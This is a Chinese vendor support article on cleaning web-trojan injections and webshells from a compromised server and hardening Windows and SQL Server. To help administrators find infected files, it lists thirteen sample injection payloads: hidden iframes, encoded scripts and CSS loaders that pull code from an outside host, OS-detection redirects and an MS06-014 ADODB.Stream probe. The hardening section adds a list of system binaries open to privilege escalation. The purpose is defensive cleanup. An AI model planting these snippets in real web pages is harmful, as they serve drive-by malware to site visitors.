【WG】WG服务器类优化,即已被挂马服务器与已被植入WEBSHELL服务器修复

发布时间: 2013-11-24 点击量:888 打印 字体:

1、故障现象

客户网站服务器已被挂马和已被植入WEBSHELL,我们为客户提供服务器修复加固方法和思路;

 

说明:服务器网站出现挂马或入侵,首先需要引导客户自身网站维护人员根据WG的攻击日志进行分析和修复。对于本章节内容,仅能是给予用户进行参考,给予一定的思路和方向。

2、故障可能原因

(1)服务器被挂马;

(2)服务器已被植入WEBSHELL;

3、故障处理流程

4.故障处理步骤

步骤1:清除被挂马页面挂马代码

如用户服务器已被挂马,我们可以协助用户进行操作,但由于WEB代码的复杂因素,最好让用户请WEB开发人员自行修复。如不具备条件我们可按如下步骤对用户服务器进行恢复。(根据服务器条件不同,此部分仅供参考

1)手工帮助用户清除被挂马服务器所留后门,使用WEBSHELL扫描工具对已被挂马服务器进行扫描。

 

2)清除服务器被挂马页面的挂马代码,常见挂马代码如下。可以使用WINDOWS文件搜索功能以下面关键字进行搜索。例如:框架挂马,我们可以搜索关键字包含 <iframesrc 的文件。JS挂马我们可以搜索关键字包含<script language的文件,切记要手工逐个排查挂马文件,以免误删用户正常文件。

一、框架挂马
<iframesrc=地址 width=0 height=0></iframe>

二、js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascriptsrc=xxx.js></script>

三、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
muma.txt可改成任意后缀

四、body挂马
<body onload="window.location='地址';"></body>

五、隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframesrc="http://www.upx.com.cn/muma.htm/"></iframe>';

六、css中挂马
body {
background-image: url('javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>")')}

七、JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八、图片伪装
<html>
<iframesrc="网马地址" height=0 width=0></iframe>
<imgsrc="图片地址"></center>
</html>

九、伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresizemarginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresizemarginwidth="0"margingheight="0">
</frameset>

十、高级欺骗
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
varurl="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一、判断系统代码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>

十二、判断是否有ms06014代码

<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframesrc=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframesrc=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
end if
</script>

十三、智能读取js的代码demo

//读取src的对象
var v = document.getElementById("advjs");
//读取src的参数
varu_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));

document.write("<iframesrc=\"http://www.upx.com.cn/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.upx.com.cn\/demo.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/www.upx.com.cn\/demo.js\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")

//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");
if (loU.length>1){

varloallPm = loU.split("&");

for (var i=0; i<loallPm.length; i++){
varloPm = loallPm[i].split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm;
}else{
return "";
}
}
}
}
return null;
}
 

步骤2:服务器安全性加固

1、系统盘和站点放置盘必须设置为NTFS格式,方便设置权限。

2、系统盘和站点放置盘除administrators 和system的用户权限全部去除。

3、启用windows自带防火墙,只保留有用的端口,比如远程和Web、Ftp(3389、80、21)等等,有邮件服务器的还要打开25和130端口。

4、安装好SQL后进入目录搜索 xplog70 然后将找到的三个文件改名或者删除。

5、更改sa密码为你都不知道的超长密码,在任何情况下都不要用sa这个帐户。

6、改名系统默认帐户名并新建一个Administrator帐户作为陷阱帐户,设置超长密码,并去掉所有用户组。(就是在用户组那里设置为空即可。让这个帐号不属于任何用户组样)同样改名禁用掉Guest用户。

7、配置帐户锁定策略(在运行中输入gpedit.msc回车,打开组策略编辑器,选择计算机配置-Windows设置-安全设置-账户策略-账户锁定策略,将账户设为三次登陆无效锁定时间30分钟复位锁定计数设为30分钟。)

8、在安全设置里本地策略-安全选项将

网络访问:可匿名访问的共享;

网络访问:可匿名访问的命名管道;

网络访问:可远程访问的注册表路径;

网络访问:可远程访问的注册表路径和子路径;

以上四项清空。

9、在安全设置里 本地策略-安全选项 通过终端服务拒绝登陆 加入

 

以下为引用的内容:
ASPNET
Guest
IUSR_*****
IWAM_*****
NETWORK SERVICE
SQLDebugger
 

(****表示你的机器名,具体查找可以点击 添加用户或组   高级  选 立即查找在底下列出的用户列表里选择. 注意不要添加进user组和administrators组 添加进去以后就没有办法远程登陆了。)

10、去掉默认共享,将以下文件存为reg后缀,然后执行导入即可。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]

"AutoShareServer"=dword:00000000

"AutoSharewks"=dword:00000000

11、 禁用不需要的和危险的服务,以下列出服务都需要禁用。

Alerter  发送管理警报和通知

Computer Browser:维护网络计算机更新

Distributed File System: 局域网管理共享文件

Distributed linktracking client   用于局域网更新连接信息

Error reporting service   发送错误报告

Remote Procedure Call (RPC) Locator   RpcNs*远程过程调用 (RPC)

Remote Registry  远程修改注册表

Removable storage  管理可移动媒体、驱动程序和库

Remote Desktop Help Session Manager  远程协助

Routing and Remote Access 在局域网以及广域网环境中为企业提供路由服务

Messenger  消息文件传输服务

Net Logon   域控制器通道管理

NTLMSecuritysupportprovide  telnet服务和Microsoft Serch用的

PrintSpooler  打印服务

telnet   telnet服务

Workstation   泄漏系统用户名列表

12、更改本地安全策略的审核策略

账户管理      成功 失败

登录事件      成功 失败

对象访问      失败

策略更改      成功 失败

特权使用      失败

系统事件      成功 失败

目录服务访问  失败

账户登录事件  成功 失败

13、更改有可能会被提权利用的文件运行权限,找到以下文件,将其安全设置里除administrators用户组全部删除,重要的是连system也不要留。

net.exe

net1.exe

cmd.exe

tftp.exe

netstat.exe

regedit.exe

at.exe

attrib.exe

cacls.exe

format.com

c.exe 特殊文件 有可能在你的计算机上找不到此文件。

在搜索框里输入

"net.exe","net1.exe","cmd.exe","tftp.exe","netstat.exe","regedit.exe","at.exe","attrib.exe","cacls.exe","format.com","c.exe"

点击搜索 然后全选 右键 属性 安全

 

步骤3:收集信息后,请联系4008111000协助处理

如果经以上1-2个步骤排查后故障无法解决,请将根据步骤1检查配置打包压缩,同时准备好WG设备的远程方式后联系4008-111000协助处理。

·    需要收集的信息:

1)服务器代码信息;

2)服务器安全性加固配置截图;

 

 

 

 

 

 

 

 

 

 

00 分享 纠错
相关条目